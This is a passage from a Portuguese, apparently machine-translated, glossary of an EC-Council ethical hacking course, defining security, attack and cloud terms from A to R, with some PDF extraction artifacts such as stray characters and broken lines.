cobriu vários tipos de testes de penetração, bem como discutiu estratégias e fases de testes de
penetração em detalhes. Este módulo também discutiu várias metodologias de teste de
penetração. Por fim, o módulo terminou com uma discussão detalhada sobre diretrizes e
recomendações para testes de penetração.

Glossário
UMA
Glossário
ÿ
Disponibilidade: Garantia de que os sistemas responsáveis por entregar, armazenar e processar informações estejam acessíveis
quando solicitados por usuários autorizados.
ÿ Autenticidade: Refere-se à característica da comunicação, documentos ou quaisquer dados que assegurem a

qualidade de ser genuíno ou incorrupto.
ÿ Ataques ativos: adulterar os dados em trânsito ou interromper a comunicação ou serviços entre os sistemas para contornar ou invadir
sistemas seguros.
ÿ Ameaças Persistentes Avançadas (APT): Um ataque focado em roubar informações da vítima

máquina sem que o usuário perceba.
ÿ Reconhecimento Ativo: As técnicas de reconhecimento ativo envolvem a aquisição de informações diretamente

interagir com o alvo por qualquer meio.
ÿ Adware: Adware refere-se a software ou programa que oferece suporte a anúncios e gera
anúncios e pop-ups.
ÿ Avaliação Ativa: Um tipo de avaliação de vulnerabilidade que usa scanners de rede para identificar os hosts,
serviços e vulnerabilidades presentes em uma rede.
ÿ Avaliação de aplicativos: Uma avaliação de aplicativos se concentra em aplicativos da Web transacionais, aplicativos cliente-servidor
tradicionais e sistemas híbridos.
ÿ Avaliação Automatizada: Neste tipo de avaliação, o hacker ético emprega diversas vulnerabilidades
ferramentas de avaliação, como Nessus, Qualys, GFI LanGuard, etc.
ÿ Ataques Online Ativos: O invasor executa a quebra de senha comunicando-se diretamente com o
máquina da vítima.
ÿ Active Sniffing: Active sniffing procura tráfego em uma LAN comutada injetando tráfego ativamente nela.
ÿ ARP Spoofing Attack: ARP spoofing/envenenamento envolve o envio de um grande número de entradas forjadas para o
cache ARP da máquina de destino.
ÿ Sequestro de Sessão Ativa: Em um ataque ativo, um invasor assume uma sessão existente quebrando
a conexão de um lado da conversa ou participando ativamente.
ÿ Seqüestro no nível do aplicativo: O seqüestro no nível do aplicativo envolve obter controle sobre a transferência de hipertexto
Sessão de usuário de protocolo (HTTP) obtendo os IDs de sessão.
ÿ Ponto de acesso (AP): Um AP é usado para conectar dispositivos sem fio a uma rede sem fio/com fio.
ÿ Associação: Refere-se ao processo de conexão de um dispositivo wireless a um AP.
ÿ AES: É uma criptografia de chave simétrica usada no WPA2 em substituição ao TKIP.
ÿ App Sandboxing: App sandboxing é um mecanismo de segurança que ajuda a proteger sistemas e usuários, limitando os recursos
que um aplicativo pode acessar para sua funcionalidade pretendida na plataforma móvel.
ÿ Ataque do Agente Smith: Um ataque do Agente Smith é realizado persuadindo a vítima a instalar um aplicativo malicioso
projetado e publicado por um invasor.
ÿ Ataque de Força Bruta: Em um ataque de força bruta, os atacantes tentam todas as combinações de personagens até que o
a senha está quebrada.
Glossário página 889 Ethical Hacking Essentials Copyright © por EC-Council Todos

Glossário
ÿ Botnet: Um botnet é uma enorme rede de sistemas comprometidos usados por invasores para realizar uma
tarefa.
ÿ Black Hats: Black hats são indivíduos que usam suas extraordinárias habilidades de computação para fins ilegais ou maliciosos
propósitos.
ÿ Controle de acesso quebrado: O controle de acesso quebrado é um método no qual um invasor identifica uma falha relacionada a
controle de acesso e burla a autenticação, o que permite que eles comprometam a rede.
ÿ Largura de Banda: Descreve a quantidade de informação que pode ser transmitida em uma conexão.
ÿ Basic Service Set Identifier (BSSID): É o endereço de controle de acesso à mídia (MAC) de um ponto de acesso (AP) ou
estação base que configurou um conjunto de serviço básico (BSS).
ÿ Bluetooth: Bluetooth é uma tecnologia de comunicação sem fio de curto alcance que substitui os cabos de conexão
dispositivos portáteis ou fixos, mantendo altos níveis de segurança.
ÿ Bluetooth Hacking: Bluetooth hacking refere-se à exploração da implementação da pilha Bluetooth

vulnerabilidades para comprometer dados confidenciais em dispositivos e redes habilitados para Bluetooth.
ÿ Bluesmacking: Um ataque Bluesmacking ocorre quando um invasor envia um pacote de ping superdimensionado para a vítima
dispositivo, causando um estouro de buffer.
ÿ Bluejacking: Bluejacking é o uso do Bluetooth para enviar mensagens aos usuários sem o consentimento do destinatário,
semelhante ao spam de e-mail.
ÿ Bluesnarfing: Bluesnarfing é um método de obter acesso a dados confidenciais em um dispositivo habilitado para Bluetooth.
ÿ BlueSniff: BlueSniff é um código de prova de conceito para um utilitário de direção Bluetooth.
ÿ Bluebugging: Bluebugging é um ataque no qual um invasor obtém acesso remoto a um dispositivo habilitado para Bluetooth sem o conhecimento
da vítima.
ÿ BluePrinting: BluePrinting é uma técnica de pegada realizada por um invasor para determinar a marca e
modelo de um dispositivo habilitado para Bluetooth de destino.
ÿ Btlejacking: Prejudicial para dispositivos BLE, é usado para contornar mecanismos de segurança e ouvir informações
sendo compartilhado.
ÿ Traga seu próprio dispositivo (BYOD): Traga seu próprio dispositivo (BYOD) refere-se a uma política que permite que um funcionário traga seus
dispositivos pessoais, como laptops, smartphones e tablets, para o local de trabalho e os use para acessar os recursos da organização seguindo
os privilégios de acesso.
ÿ Rede de Negócios: Compõe-se de uma rede de sistemas que oferecem infra-estrutura de informação ao
o negócio.
C
ÿ Confidencialidade: Confidencialidade é a garantia de que a informação é acessível apenas aos autorizados
para ter acesso
ÿ Ataques de proximidade : Ataques de proximidade são executados quando o atacante está em proximidade física com o
sistema ou rede de destino.
ÿ Metodologia Cyber Kill Chain: A metodologia cyber kill chain é um componente da defesa orientada por inteligência para a identificação e prevenção
de atividades de invasão maliciosa.
ÿ Ciberterroristas: Ciberterroristas são indivíduos com uma ampla gama de habilidades que são motivados por religiões
ou crenças políticas para criar o medo de interrupção em larga escala das redes de computadores.
ÿ Sindicatos Criminosos: Sindicatos Criminosos são grupos de indivíduos ou comunidades que estão envolvidos em
atividades criminosas organizadas, planejadas e prolongadas.
ÿ Limpeza de rastros: A limpeza de rastros refere-se às atividades realizadas por um invasor para ocultar atos maliciosos.

Glossário
ÿ Crypter: É um programa de software que pode ocultar a existência de malware.
ÿ Worms de computador: Worms de computador são programas maliciosos autônomos que replicam, executam e se espalham
através de conexões de rede de forma independente, sem intervenção humana.
ÿ Avaliação Credenciada: Avalia a rede obtendo as credenciais de todas as máquinas presentes na

rede.
ÿ Engenharia Social baseada em computador: A engenharia social baseada em computador depende de computadores e da Internet
sistemas para executar a ação visada.
ÿ Chain Letters: Uma corrente é uma mensagem que oferece brindes, como dinheiro e software, sob a condição
que o usuário encaminha o e-mail para um número predeterminado de destinatários.
ÿ Insider comprometido: Um insider com acesso a ativos críticos de uma organização que está comprometido por um agente de ameaça
externo.
ÿ Ataques Cross-Site Scripting (XSS): Os ataques cross-site scripting ('XSS' ou 'CSS') exploram vulnerabilidades em páginas da Web
geradas dinamicamente, permitindo que invasores mal-intencionados injetem scripts do lado do cliente em páginas da Web
visualizadas por outros usuários.
ÿ CCMP: É um protocolo de criptografia usado no WPA2 para criptografia e autenticação fortes.
ÿ Associação incorreta do cliente: A associação incorreta é uma falha de segurança que pode ocorrer quando um cliente de rede se
conecta a um AP vizinho.
ÿ
Infraestrutura crítica: A infraestrutura crítica refere-se a uma coleção de sistemas e ativos físicos ou lógicos, cuja falha ou destruição
afetará gravemente a segurança, a proteção, a economia ou a saúde pública.
ÿ Injeção de Comando: Os invasores alteram pacotes de RF ou injetam seus próprios pacotes empregando engenharia reversa
técnicas para obter acesso completo à máquina de destino.
ÿ Computação em nuvem: A computação em nuvem é uma entrega sob demanda de capacidades de TI onde a infraestrutura de TI e
os aplicativos são fornecidos aos assinantes como um serviço medido em uma rede.
ÿ Container-as-a-Service (CaaS): Oferece virtualização de containers engines, e gerenciamento de containers,

aplicativos e clusters por meio de um portal da web ou API.
ÿ Community Cloud: Infraestrutura compartilhada entre diversas organizações de uma comunidade específica com
preocupações comuns (segurança, conformidade, jurisdição, etc.).
ÿ Consumidor de nuvem: Um consumidor de nuvem é uma pessoa ou organização que mantém um relacionamento comercial com
os provedores de serviços de nuvem (CSPs) e utiliza os serviços de computação em nuvem.
ÿ Provedor de nuvem: Um provedor de nuvem é uma pessoa ou organização que adquire e gerencia a computação
infra-estrutura destinada à prestação de serviços aos interessados via acesso à rede.
ÿ Cloud Carrier: Um provedor de nuvem atua como um intermediário que fornece conectividade e serviços de transporte
entre CSPs e consumidores de nuvem.
ÿ Cloud Auditor: Um auditor de nuvem é uma parte que realiza um exame independente do serviço de nuvem
controles para expressar uma opinião sobre eles.
ÿ Cloud Broker: Uma entidade que gerencia serviços de nuvem em termos de uso, desempenho e entrega, e mantém o relacionamento
entre provedores de nuvem e consumidores.
ÿ Cloud Storage: armazenamento em nuvem é um meio de armazenamento de dados usado para armazenar dados digitais em pools lógicos usando um
rede.
ÿ Container: Um container é um pacote de um aplicativo/software incluindo todas as suas dependências, como arquivos de biblioteca,
arquivos de configuração, binários e outros recursos que são executados independentemente de outros processos no ambiente de
nuvem.

Glossário
ÿ Orquestração de Contêineres: Um processo automatizado de gerenciamento dos ciclos de vida de contêineres de software e seus ambientes
dinâmicos.
ÿ Cloud Cryptojacking: Cryptojacking é o uso não autorizado do computador da vítima para minerar furtivamente
moeda digital.
ÿ Cloudborne: Cloudborne é uma vulnerabilidade que reside em um servidor de nuvem bare-metal que permite que os invasores implantem um
backdoor malicioso em seu firmware.
D
ÿ Ataques de distribuição: Os ataques de distribuição ocorrem quando os invasores adulteram o hardware ou o software antes
instalação.
ÿ Drive-by Downloads: Refere-se à exploração de falhas no software do navegador para instalar malware apenas visitando um
página da web.
ÿ Avaliação de banco de dados: Uma avaliação de banco de dados é qualquer avaliação focada em testar os bancos de dados para o
presença de qualquer configuração incorreta ou vulnerabilidades conhecidas.
ÿ Avaliação Distribuída: Avalia os ativos distribuídos da organização, como aplicativos cliente e servidor, simultaneamente por meio de técnicas de
sincronização apropriadas.
ÿ Ataque de Dicionário: Nesse tipo de ataque, um arquivo de dicionário é carregado em um aplicativo de cracking executado em contas de usuário.
ÿ Senhas padrão: Uma senha padrão é uma senha fornecida pelo fabricante com o novo equipamento
(por exemplo, switches, hubs, roteadores) protegidos por senha.
ÿ Dumpster Diving: Dumpster Diving é o processo de recuperação de informações pessoais ou organizacionais confidenciais, pesquisando em
lixeiras.
ÿ DHCP Starvation Attack: DHCP starvation attack é um processo de inundar os servidores DHCP com solicitações DHCP falsas e usar todos os
endereços IP disponíveis.
ÿ DNS Poisoning: Domain Name Server (DNS) envenenamento é a manipulação não autorizada de endereços IP em
o cache DNS.
ÿ Ataque DoS: Denial-of-Service (DoS) é um ataque a um computador ou rede que reduz, restringe ou
impede a acessibilidade dos recursos do sistema para seus usuários legítimos.
ÿ Ataque DDoS: negação de serviço distribuída (DDoS) é um ataque coordenado que envolve uma multidão de sistemas comprometidos (Botnet)
atacando um único alvo, negando assim o serviço aos usuários do sistema visado.
ÿ Ataque Distributed Reflection Denial-of-Service (DRDoS): DDoS, também conhecido como ataque falsificado, envolve o uso de várias máquinas
intermediárias e secundárias que contribuem para o ataque DDoS real contra a máquina ou aplicativo de destino.
ÿ Raiz do Documento: A raiz do documento é um dos diretórios de arquivos raiz do servidor web que armazena
Arquivos HTML relacionados às páginas da Web de um nome de domínio.
ÿ Sequestro de servidor DNS: O invasor compromete o servidor DNS e altera as configurações de DNS para que todas as solicitações que chegam
ao servidor da Web de destino sejam redirecionadas para seu próprio servidor malicioso.
ÿ Ataque de amplificação de DNS: o invasor usa PCs comprometidos com endereços IP falsificados para amplificar o DDoS
ataques ao servidor DNS das vítimas, explorando o método recursivo do DNS.
ÿ Ataques de passagem de diretório: Nos ataques de passagem de diretório, os invasores usam a sequência ../ (ponto-ponto-barra) para acessar
diretórios restritos fora do diretório raiz do servidor web.
ÿ Direct-Sequence Spread Spectrum (DSSS): DSSS é uma técnica de espalhamento espectral que multiplica o original
sinal de dados com um código de espalhamento de ruído pseudo-aleatório.

Glossário
ÿ Docker: Docker é uma tecnologia de código aberto usada para desenvolver, empacotar e executar aplicativos e todas as suas dependências
na forma de contêineres, para garantir que o aplicativo funcione em um ambiente contínuo.
ÿ Indicadores de e-mail : indicadores de e-mail são usados para enviar dados mal-intencionados para a organização ou indivíduo de destino.
ÿ Exploração: A exploração aciona o código malicioso do adversário para explorar uma vulnerabilidade no
sistema, aplicativo ou servidor em um sistema de destino.
ÿ Hacking ético: Hacking ético é a prática de empregar habilidades de computador e rede para auxiliar
organizações em testar sua segurança de rede para possíveis brechas e vulnerabilidades.
ÿ
Exploit: É a parte do malware que contém um código ou uma sequência de comandos que pode se aproveitar de um bug ou vulnerabilidade
em um sistema ou dispositivo digital.
ÿ Avaliação Externa: A avaliação externa examina a rede do ponto de vista de um hacker para identificar
explorações e vulnerabilidades acessíveis ao mundo exterior.
ÿ Espionagem: Espionagem refere-se a uma pessoa não autorizada ouvindo uma conversa ou lendo
mensagens dos outros.
ÿ Injeção de SQL baseada em erro: A injeção de SQL baseada em erro força o banco de dados a executar alguma operação em
qual o resultado será um erro.
ÿ EAP: O Extensible Authentication Protocol (EAP) oferece suporte a vários métodos de autenticação, como cartões de token, Kerberos e
certificados.
ÿ Perímetro de Segurança Eletrônica: É referido como o limite entre zonas seguras e inseguras.
F
ÿ Lei Federal de Gerenciamento de Segurança da Informação (FISMA): A FISMA fornece uma estrutura abrangente para garantir a eficácia
dos controles de segurança da informação sobre recursos de informação que suportam operações e ativos federais.
ÿ Ataque de Fragmentação: Nos ataques de fragmentação, o atacante envia um grande número de pacotes fragmentados
para um servidor web de destino com uma taxa de pacotes relativamente pequena.
ÿ
Malware sem arquivo: o malware sem arquivo infecta software, aplicativos e outros protocolos legítimos existentes no sistema para
executar várias atividades maliciosas.
ÿ Frequency-Hopping Spread Spectrum (FHSS): FHSS, também conhecido como acesso múltiplo por divisão de código com salto de
frequência (FH-CDMA), é um método de transmissão de sinais de rádio comutando rapidamente uma portadora entre muitos canais de
frequência.
ÿ Ataques de injeção de falha: Os ataques de injeção de falha, também conhecidos como ataques de perturbação, ocorrem quando um
perpetrador injeta qualquer programa defeituoso ou malicioso no sistema para comprometer a segurança do sistema.
ÿ Function-as-a-Service (FaaS): fornece uma plataforma para desenvolver, executar e gerenciar aplicativos
funcionalidades para microsserviços.
G
ÿ Regulamento Geral de Proteção de Dados (RGPD): O Regulamento Geral de Proteção de Dados (RGPD) é um dos
mais rigorosas leis de privacidade e segurança globalmente.
ÿ Chapéus Cinzentos: Os chapéus cinzentos são os indivíduos que trabalham ofensivamente e defensivamente em vários momentos.
ÿ Obter acesso: Obter acesso refere-se ao ponto em que o invasor obtém acesso ao sistema operacional
sistema ou para aplicativos no computador ou na rede.
ÿ Global System for Mobile Communications (GSM): É um sistema universal utilizado para transmissão de dados móveis em redes sem fio
em todo o mundo.

Glossário
ÿ Indicadores baseados em host: indicadores baseados em host são encontrados realizando uma análise do sistema infectado
dentro da rede organizacional.
ÿ Hacking: Hacking no campo da segurança informática refere-se à exploração de vulnerabilidades do sistema e

comprometer os controles de segurança para obter acesso não autorizado ou inapropriado aos recursos do sistema.
ÿ Hacker: Um hacker é uma pessoa que invade um sistema ou rede sem autorização para destruir, roubar dados confidenciais ou realizar ataques
maliciosos.
ÿ Hacktivista: Hacktivismo é uma forma de ativismo em que hackers invadem computadores governamentais ou corporativos
sistemas como um ato de protesto.
ÿ Equipes de hackers: Uma equipe de hackers é um consórcio de hackers qualificados com seus próprios recursos e financiamento.
Eles trabalham juntos em sinergia para pesquisar tecnologias de ponta.
ÿ Avaliação baseada em host: As avaliações baseadas em host envolvem a realização de uma verificação de nível de configuração para
identificar as configurações do sistema, diretórios de usuários, sistemas de arquivos, configurações de registro, etc., para avaliar a
possibilidade de comprometimento.
ÿ Engenharia social baseada em humanos: A engenharia social baseada em humanos envolve interação humana. O invasor interage com o
funcionário da organização de destino para coletar informações confidenciais.
ÿ Cartas Hoax: Uma farsa é uma mensagem alertando seus destinatários sobre uma ameaça inexistente de vírus de computador. depende
em engenharia social para expandir seu alcance.
ÿ Ataque de divisão de resposta HTTP: Um ataque de divisão de resposta HTTP é um ataque baseado na Web no qual o invasor engana o
servidor injetando novas linhas nos cabeçalhos de resposta, juntamente com código arbitrário.
ÿ Hotspot: São locais onde as redes sem fio estão disponíveis para uso público.
ÿ Nuvem Híbrida: Combinação de duas ou mais nuvens (privadas, comunitárias ou públicas) que permanecem entidades únicas, mas estão
unidas, oferecendo assim os benefícios de vários modelos de implantação.
EU
ÿ Segurança da Informação: A segurança da informação é um estado de bem-estar da informação e infraestrutura em que a possibilidade de
roubo, adulteração e interrupção de informações e serviços é baixa ou tolerável.
ÿ
Integridade: Integridade é a confiabilidade dos dados ou recursos na prevenção de alterações impróprias e não autorizadas.
ÿ Ataques internos: Um ataque interno é um ataque por alguém de dentro de uma organização que autorizou
acesso à sua rede e está ciente da arquitetura da rede.
ÿ Indicadores de Comprometimento (IoCs): Indicadores de Comprometimento (IoCs) são as pistas, artefatos e pedaços de dados forenses
encontrados na rede ou sistema operacional de uma organização que indicam uma possível invasão ou atividade maliciosa na infraestrutura
da organização.
ÿ Espiões Industriais: Espiões industriais são indivíduos que realizam espionagem corporativa espionando ilegalmente
organizações concorrentes.
ÿ Representação: A representação é uma técnica comum de engenharia social baseada em humanos em que um invasor
finge ser uma pessoa legítima ou autorizada.
ÿ
Insiders: Um insider é qualquer funcionário (pessoa de confiança) que tenha acesso a ativos críticos de uma organização.
ÿ Falhas de injeção: Falhas de injeção são vulnerabilidades de aplicativos da web que permitem que dados não confiáveis sejam
interpretada e executada como parte de um comando ou consulta.
ÿ Proteção insuficiente da camada de transporte: proteção insuficiente da camada de transporte é uma falha de segurança que ocorre
quando um aplicativo falha em proteger o tráfego sensível que flui em uma rede.

Glossário
ÿ Desserialização Insegura : A desserialização insegura desserializa o conteúdo serializado malicioso junto com o código malicioso
injetado, comprometendo o sistema ou a rede.
ÿ Registro e monitoramento insuficientes : Registro e monitoramento insuficientes referem-se ao cenário em que o software de detecção
não registra o evento malicioso ou ignora detalhes importantes sobre o evento.
ÿ In-band SQL Injection: Um invasor usa o mesmo canal de comunicação para realizar o ataque e
recuperar os resultados.
ÿ Injector: Este programa injeta exploits ou códigos maliciosos disponíveis no malware em outros vulneráveis
processos em execução.
ÿ Avaliação Interna: Uma avaliação interna envolve examinar a rede interna para encontrar exploits e
vulnerabilidades.
ÿ
Banda Industrial, Científica e Médica (ISM): Esta banda é um conjunto de frequências usadas pelas comunidades industriais,
científicas e médicas internacionais.
ÿ Internet das Coisas (IoT): Internet das Coisas (IoT), também conhecida como Internet de Tudo (IoE), refere-se à rede de dispositivos
com endereços IP e a capacidade de detectar, coletar e enviar dados usando sensores incorporados, comunicação hardware e
processadores.
ÿ Rede Industrial: Uma rede de sistemas de controle automatizados é conhecida como rede industrial.
ÿ Protocolos Industriais: Protocolos usados para comunicação serial e comunicação via Ethernet padrão.
ÿ Convergência de TI/TO: A convergência de TI/TO é a integração de sistemas de computação de TI e sistemas de monitoramento de

operação de TO para preencher a lacuna entre as tecnologias de TI/TO para melhorar a segurança, eficiência e produtividade
gerais.
ÿ Infrastructure-as-a-Service (IaaS): Este serviço fornece máquinas virtuais e outros hardwares e sistemas operacionais (SOs)
abstratos, que podem ser controlados por meio de uma interface de programação de aplicativo (API) de serviço.
ÿ Identity-as-a-Service (IDaaS): oferece serviços IAM, incluindo SSO, MFA, IGA e coleta de inteligência.
k
ÿ Keylogger: Keyloggers são programas de software ou dispositivos de hardware que registram as teclas digitadas no teclado do
computador de um usuário de computador individual ou de uma rede de computadores.
ÿ Autenticação Kerberos: Kerberos é um protocolo de autenticação de rede que fornece autenticação forte para aplicativos cliente/
servidor por meio de criptografia de chave secreta.
ÿ Key Reinstallation Attack (KRACK): Explora as falhas na implementação do processo de handshake de quatro vias no protocolo de
autenticação WPA2, que é usado para estabelecer uma conexão entre um dispositivo e um AP.
ÿ Ataque KNOB: Um ataque de negociação de chave de Bluetooth (KNOB) permite que um invasor viole os mecanismos de segurança
do Bluetooth e execute um ataque MITM em dispositivos emparelhados sem ser rastreado.
ÿ Kubernetes: Kubernetes, também conhecido como K8s, é uma plataforma de orquestração de código aberto, portátil e extensível
desenvolvido pelo Google para gerenciar aplicativos em contêineres e microsserviços.
eu
ÿ LEAP: Lightweight EAP (LEAP) é uma versão proprietária do EAP desenvolvida pela Cisco.
ÿ Riscos Legais: Este tipo de riscos decorre de obrigações legais.
M
ÿ Manter o acesso: Manter o acesso refere-se à fase em que o invasor tenta reter seu
propriedade do sistema.

Glossário
ÿ Malware: Malware é um software malicioso que danifica ou desativa os sistemas de computador e dá acesso limitado ou
controle total dos sistemas ao criador do malware para fins de roubo ou fraude.
ÿ Malvertising: Esta técnica envolve a incorporação de anúncios carregados de malware em sites legítimos
canais de publicidade para espalhar malware em sistemas de usuários desavisados.
ÿ Avaliação Manual: Neste tipo de avaliação, o hacker ético avalia manualmente as vulnerabilidades, classificação de vulnerabilidade,
pontuação de vulnerabilidade, etc.
ÿ Engenharia social baseada em dispositivos móveis: os invasores usam aplicativos móveis para realizar ataques sociais baseados em dispositivos móveis
Engenharia.
ÿ Insider mal-intencionado: Um funcionário descontente ou demitido que rouba dados ou destrói o

redes intencionalmente introduzindo malware na rede corporativa.
ÿ MAC Flooding: MAC flooding envolve a inundação da tabela CAM com endereço MAC falso e pares de IP
até que esteja cheio.
ÿ Spoofing/Duplicating de MAC: Um ataque de duplicação de MAC é iniciado ao farejar uma rede em busca de endereços MAC de clientes
que estão ativamente associados a uma porta de switch e reutilizar um desses endereços.
ÿ Ataque Multivetorial: Em ataques DDoS multivetoriais, o invasor usa combinações de volumétrico, protocolo,
e ataques na camada de aplicativos para derrubar o sistema ou serviço de destino.
ÿ Múltiplas Entradas, Múltiplas Saídas-Multiplexação Ortogonal por Divisão de Frequência (MIMO-OFDM): MIMO
OFDM influencia a eficiência espectral dos serviços de comunicação sem fio 4G e 5G.
ÿ Ataque man-in-the-middle/representação: em um ataque MITM/representação, os invasores manipulam os dados transmitidos entre os

dispositivos que se comunicam por meio de uma conexão Bluetooth (piconet).
ÿ Spam de celular: Spam de celular, também conhecido como spam de SMS, spam de texto ou m-spam, refere-se a mensagens não solicitadas
enviadas em massa para números de telefone/IDs de e-mail conhecidos/desconhecidos para telefones celulares de destino.
ÿ Gerenciamento de dispositivos móveis (MDM): o Gerenciamento de dispositivos móveis (MDM) fornece plataformas para distribuição sem
fio ou com fio de aplicativos, dados e definições de configuração para todos os tipos de dispositivos móveis, incluindo telefones celulares,
smartphones e tablets, entre outros sobre.
ÿ Ataque de Reprogramação Maliciosa: Os invasores injetam malware no firmware dos controladores remotos para manter um acesso
persistente e completamente remoto ao sistema.
ÿ Multi Cloud: ambiente heterogêneo dinâmico que combina cargas de trabalho em vários fornecedores de nuvem,
gerenciado por meio de uma interface proprietária para atingir metas de negócios de longo prazo.
ÿ Microsserviços: aplicativos monolíticos são divididos em subaplicativos hospedados na nuvem chamados

microsserviços que trabalham juntos, cada um executando uma tarefa única.
N
ÿ Não-repúdio: O não-repúdio é uma forma de garantir que o remetente de uma mensagem não possa posteriormente negar ter enviado a
mensagem e que o destinatário não possa negar ter recebido a mensagem.
ÿ Indicadores de rede: Os indicadores de rede são úteis para comando e controle, distribuição de malware e detalhes de identificação sobre o
sistema operacional, tipo de navegador e outras informações específicas do computador.
ÿ Ameaças Naturais: Fatores naturais, como incêndios, inundações, falhas de energia, raios, meteoros e terremotos
são ameaças potenciais aos ativos de uma organização.
ÿ Avaliação baseada em rede: As avaliações de rede determinam os possíveis ataques de segurança de rede que
podem ocorrer no sistema de uma organização.
ÿ Avaliação Não Credenciada: Avalia a rede sem adquirir nenhuma credencial dos ativos
presentes na rede corporativa.

Glossário
ÿ Autenticação NTLM: NT LAN Manager (NTLM) é um esquema de autenticação padrão que executa a autenticação usando uma estratégia de
desafio/resposta.
ÿ Ataques Não Eletrônicos: O invasor não precisa de conhecimento técnico para quebrar a senha, portanto, é
conhecido como ataque não técnico.
ÿ Insider negligente: Insiders que não foram instruídos sobre possíveis ameaças à segurança ou que simplesmente ignoram os procedimentos
gerais de segurança para atender à eficiência do local de trabalho.
ÿ Sequestro no nível da rede: O sequestro no nível da rede é a interceptação de pacotes durante a transmissão
entre um cliente e um servidor em uma sessão TCP/User Datagram Protocol (UDP).
ÿ Perímetro de Rede: É o limite mais externo de uma zona de rede, ou seja, grupo fechado de ativos.
ÿ Hackers Organizados: Hackers Organizados são um grupo de hackers trabalhando juntos em atividades criminosas. Esses hackers são
malfeitores ou criminosos endurecidos que usam dispositivos alugados ou botnets para realizar vários ataques cibernéticos para roubar
dinheiro das vítimas.
ÿ Obfuscator: É um programa que oculta o código malicioso de malware através de diversas técnicas, tornando assim
torna difícil para os mecanismos de segurança detectá-lo ou removê-lo.
ÿ Ataques offline: Ataques offline referem-se a ataques de senha em que um invasor tenta recuperar texto não criptografado
senhas de um despejo de hash de senha.
ÿ Injeção de SQL fora de banda: os invasores usam diferentes canais de comunicação (como funcionalidade de e-mail de banco de dados ou
funções de gravação e carregamento de arquivos) para realizar o ataque e obter os resultados.
ÿ Multiplexação por divisão de frequência ortogonal (OFDM): Um OFDM é um método de modulação digital de dados no qual um sinal, em
uma frequência escolhida, é dividido em várias frequências portadoras que são ortogonais (ocorrendo em ângulos retos) entre si.
ÿ Tecnologia Operacional (TO): TO é o software e hardware projetado para detectar ou causar alterações nas operações industriais por meio
do monitoramento direto e/ou controle de dispositivos físicos industriais.
ÿ Riscos Organizacionais: Este tipo de risco pode ocorrer como efeito colateral do teste de penetração.
P
ÿ Ataques Passivos: Os ataques passivos envolvem interceptar e monitorar o tráfego de rede e o fluxo de dados na rede de destino e não
adulteram os dados.
ÿ Phishing: Phishing é a prática de enviar um e-mail ilegítimo alegando falsamente ser de um site legítimo
na tentativa de adquirir informações pessoais ou de conta de um usuário.
ÿ Procedimentos: “Procedimentos” são abordagens organizacionais que os agentes de ameaças seguem para lançar um ataque.
ÿ Reconhecimento Passivo: Envolve a aquisição de informações sem interagir diretamente com o alvo.
ÿ Adivinhação de senha: Adivinhação de senha é uma técnica de quebra de senha que envolve a tentativa de logar
para o sistema de destino com senhas diferentes manualmente.
ÿ Pass the Ticket: Pass the Ticket é uma técnica usada para autenticar um usuário em um sistema que está usando Kerberos sem fornecer a
senha do usuário.
ÿ Piggybacking: Piggybacking geralmente implica a entrada em um prédio ou área de segurança com o consentimento do
pessoa autorizada.
ÿ Packer: Este software comprime o arquivo de malware para converter o código e os dados do malware em um
formato ilegível.
ÿ Payload: É a parte do malware que realiza a atividade desejada quando ativado.

Glossário
ÿ Avaliação Passiva: Avaliações passivas farejam o tráfego presente na rede para identificar o ativo
sistemas, serviços de rede, aplicativos e vulnerabilidades.
ÿ Quebra de senha: A quebra de senha é o processo de recuperação de senhas dos dados transmitidos por um sistema de computador ou dos
dados armazenados nele.
ÿ Ataques Online Passivos: O invasor não precisa se comunicar com o sistema, mas monitorar passivamente
ou gravar os dados que passam pelo canal de comunicação, de e para o sistema.
ÿ Insider profissional: Insiders profissionais são os insiders mais prejudiciais. Eles usam sua técnica
conhecimento para identificar fragilidades e vulnerabilidades na rede da empresa.
ÿ Packet Sniffing: Packet sniffing é o processo de monitoramento e captura de todos os pacotes de dados que passam
uma determinada rede usando um aplicativo de software ou dispositivo de hardware.
ÿ Sniffing passivo: Sniffing passivo refere-se a sniffing através de um hub, em que o tráfego é enviado para todas as portas.
ÿ Ataque Ping of Death: Em um ataque Ping of Death (PoD), um invasor tenta travar, desestabilizar ou congelar o sistema ou serviço de
destino enviando pacotes malformados ou superdimensionados usando um simples comando ping.
ÿ Ataque Peer-to-Peer: Um ataque peer-to-peer é uma forma de ataque DDoS em que o atacante explora um número
de bugs em servidores peer-to-peer para iniciar um ataque DDoS.
ÿ Ataque permanente de negação de serviço: ataques DoS permanentes (PDoS), também conhecidos como phlashing, são puramente direcionados
hardware e causar danos irreversíveis ao hardware.
ÿ Sequestro de Sessão Passivo: Em um ataque passivo, após o sequestro de uma sessão, um invasor apenas observa e
registra todo o tráfego durante a sessão.
ÿ Tampering de Parâmetros/Formulários: Envolve a manipulação de parâmetros trocados entre cliente e

servidor para modificar os dados do aplicativo.
ÿ PEAP: É um protocolo que encapsula o EAP dentro de uma Camada de Transporte criptografada e autenticada
Túnel de segurança (TLS).
ÿ Modelo Purdue: O modelo Purdue é derivado do modelo Purdue Enterprise Reference Architecture (PERA), que é um modelo conceitual
amplamente usado que descreve as conexões internas e dependências de componentes importantes em redes ICS.
ÿ Controlador lógico programável (PLC): os PLCs são suscetíveis a ataques cibernéticos, pois são usados para controlar os processos físicos
das infraestruturas críticas.
ÿ Análise de energia: os invasores observam a mudança no consumo de energia dos semicondutores durante o clock
ciclos.
ÿ Platform-as-a-Service (PaaS): oferece ferramentas de desenvolvimento, gerenciamento de configuração e implantação

plataformas sob demanda que podem ser usadas pelos assinantes para desenvolver aplicativos personalizados.
ÿ Nuvem pública: os serviços são prestados em uma rede aberta para uso público.
ÿ Nuvem Privada: A infraestrutura de nuvem é operada apenas por uma única organização.
ÿ Teste de penetração: O teste de penetração é um tipo de teste de segurança que avalia a capacidade de uma organização de proteger sua
infraestrutura, como rede, aplicativos, sistemas e usuários contra ameaças externas e internas.
R
ÿ Ransomware: Ransomware é um tipo de malware que restringe o acesso aos arquivos e pastas do sistema do computador e exige um
pagamento de resgate online ao(s) criador(es) do malware para remover as restrições.
ÿ Reconhecimento: Reconhecimento refere-se à fase preparatória onde um atacante procura reunir

informações sobre um alvo antes de lançar um ataque.

Glossário
ÿ Rainbow Table Attack: Um ataque Rainbow Table usa a técnica criptanalítica de compensação tempo-memória, que requer menos tempo do que
outras técnicas.
ÿ Rainbow Table: Uma Rainbow Table é uma tabela pré-computada que contém listas de palavras como arquivos de dicionário e
listas de força bruta e seus valores de hash.
